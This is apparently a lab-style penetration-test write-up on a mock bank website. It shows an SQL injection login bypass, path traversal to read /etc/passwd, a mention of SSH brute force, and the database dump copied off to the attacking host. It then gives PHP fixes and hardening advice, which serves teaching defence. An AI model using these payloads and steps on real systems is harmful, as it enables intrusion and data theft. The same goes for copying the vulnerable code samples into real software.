Enter the corporation's internal network and collect sensitive data. Explain how to fix it.
```mermaid
architecture-beta
group dmz(mdi:cloud-outline)[DMZ]
group priv(mdi:cloud-lock)[Private Network]
service db(mdi:database-outline)[MariaDB] in priv
service server(mdi:server-outline)[Http Server] in dmz
service internet(mdi:internet)[Internet]
service host(mdi:remote-desktop)[Attacking Host]
db:T -- B:server
internet:R -- L:server
host:R -- L:internet
```
When arriving on the homepage, the first thing we notice is the login form, and the most logical thing to try is an SQL injection.
The form uses an email input, so the browser checks before submission that the content matches an email pattern. With the developer tools we can turn it into a text input.
- login: `' or 1=1; #`
- password: doesn't matter
By chance, while browsing the different pages I get access to, I notice a GET parameter that refers to a .php file, and I wonder whether I can use it to include a system file.
http://192.168.122.104/banquignole/comptes.php?offre=epargne.php
I want to display /etc/passwd.
Since the HTTP server's document root is /var/www/html, we need to go up three directories, plus one more for this website in particular because it lives in the 'banquignole' directory.
http://192.168.122.104/banquignole/comptes.php?offre=../../../../etc/passwd
I look for a user account for which SSH connections may be allowed.
So, I already have the user for the SSH connection and the IPv4 address of the web server.
If you don't know the IP address you can resolve it with:
```sh
nslookup domain-name.com
```
But the password is still missing.
Hopefully, it can be found with the brute-force method by running bruteforce_ssh.py, which I developed.
```sh
ssh user@web_server_ip
```

I infiltrated the DMZ, and the company's internal network is now accessible.
I could now try to get in there too, but to steal the data stored on the MariaDB server it won't be necessary.
First of all, let's see what is happening in the /var/www/html/banquignole directory.

```sh
ls /var/www/html/banquignole
```

I am looking for the file that initialises the DB connection.

```sh
# on the web server, with the credentials found in that file
mysql -u user -p -h mariadb_server_ip
# inside the mysql client:
SHOW DATABASES;
exit
mysqldump -u user -p -h mariadb_server_ip db_name > db_dump.sql
```

From the attacking machine:

```sh
scp user@web_server_ip:db_dump.sql .
mysql -u root -p -e "CREATE DATABASE database_name;"
mysql -u root -p database_name < db_dump.sql
```

The login code as found:

```php
$email = $_POST['email'];
$mdp = $_POST['password'];
$dbco->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// user input is concatenated straight into the query text
$sql = "SELECT email, id_client, nom, prenom, passwd FROM clients WHERE email = '$email' and passwd = '$mdp'";
$sth = $dbco->prepare($sql);
$sth->execute();
$user = $sth->fetch(PDO::FETCH_ASSOC);
```

The fixed version, using a prepared statement with bound parameters:

```php
$email = isset($_POST['email']) ? trim($_POST['email']) : '';
$mdp = isset($_POST['password']) ? $_POST['password'] : '';
$dbco->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
// named placeholders: the values are sent separately and never become part of the SQL text
$sql = "SELECT email, id_client, nom, prenom, passwd FROM clients WHERE email = :email and passwd = :passwd";
$sth = $dbco->prepare($sql);
$sth->bindParam(':email', $email, PDO::PARAM_STR);
$sth->bindParam(':passwd', $mdp, PDO::PARAM_STR);
$sth->execute();
$user = $sth->fetch(PDO::FETCH_ASSOC);
```

The include code in comptes.php as found:

```php
if ( (strlen($_GET['offre']) != 0) && (isset($_GET['offre'])) ) {
    $offre = $_GET['offre'];
    // any readable path is included, hence ../../../../etc/passwd works
    if (file_exists($offre)) {
        require_once($offre);
    }
}
```

The fixed version, which only accepts values that look like a .php file name:

```php
// isset() is tested first so that an absent parameter does not raise a notice
if ( isset($_GET['offre']) && (strlen($_GET['offre']) != 0) ) {
    $offre = $_GET['offre'];
    $safeRequest = ( preg_match("/^[a-zA-Z0-9\.\-\/]+\.php$/", $offre) === 1 );
    if ($safeRequest) {
        if (file_exists($offre)) {
            require_once($offre);
        }
    }
}
```

Disable SSH connections with passwords, and only allow connections with passphrase-protected RSA keys.
The MySQL user used by the web server to connect to the database mustn't be allowed to dump the database (restrict it with GRANT privileges...).
This capability isn't necessary on a web server and only creates a security flaw.
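The regular expression in the comptes.php fix above still accepts `/` and `.`, so any relative path that ends in `.php` passes the check. An allowlist of known fragments is the stronger control; the following is an added example (not the project's code) that assumes the offer fragments live in an `offres/` subdirectory next to comptes.php and that `courant.php` is a second, hypothetical offer.

```php
<?php
// Added hardening example, not the original project's code.
// Assumption: includable fragments live in offres/ next to this file.

// 1) Allowlist: the public parameter value is a key, never a path.
//    'courant.php' is a hypothetical second offer used for illustration.
const OFFRES = [
    'epargne.php' => 'epargne.php',
    'courant.php' => 'courant.php',
];

/**
 * Resolve ?offre=... to an absolute path inside $baseDir, or null.
 * Two independent controls: the allowlist, then a realpath() containment
 * check so a symlink or a later edit to OFFRES cannot escape $baseDir.
 */
function resolveOffre($param, string $baseDir): ?string
{
    // is_string() rejects ?offre[]=x, which would otherwise reach isset()
    if (!is_string($param) || !isset(OFFRES[$param])) {
        return null;                          // unknown offer: refuse
    }
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . OFFRES[$param]);
    if ($base === false || $path === false) {
        return null;                          // directory or fragment missing
    }
    // 2) Containment: the resolved file must sit strictly under $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// ?offre=epargne.php               -> .../banquignole/offres/epargne.php
// ?offre=../../../../etc/passwd    -> null (not an allowlist key)
// ?offre=../comptes.php            -> null (not an allowlist key)
$offre = resolveOffre($_GET['offre'] ?? null, __DIR__ . '/offres');
if ($offre === null) {
    http_response_code(404);
    exit('Unknown offer');
}
require_once $offre;
```

Because the lookup never uses the request value as a file name, the traversal shown earlier is rejected before any filesystem call is made.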